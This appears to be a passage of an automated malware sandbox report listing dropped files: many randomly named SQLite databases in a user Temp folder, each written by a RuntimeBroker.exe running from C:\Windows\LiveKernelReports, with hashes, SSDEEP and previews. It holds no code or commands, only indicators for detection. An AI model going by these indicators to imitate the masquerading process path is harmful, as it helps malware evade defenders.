                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\fulGOXAGc3

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\fy4jQj9Qty

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\g0cnN19Ln3

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\gB0PdRAd96

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\gDEAcbZaW9

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\gWSGFCRBII

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\gukTemmqLA

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\hRn6UKvxdW

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\hVZA6YWOjg

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\hk0IBJLo8F

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\i2LtgQOobt

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\i6m4hur277

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\iInHSGlrvT

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\iXT0uoDdar

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\iftkGTBA3n

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ijYSiIPYMC

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\invTgtveux

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\inxWYTeNR8

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\ipWtWHxZPO

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\iyQJs0QGTM

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\jINBYoYt2V

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\jatjbNXKXz

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\jdeF0Imnon

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
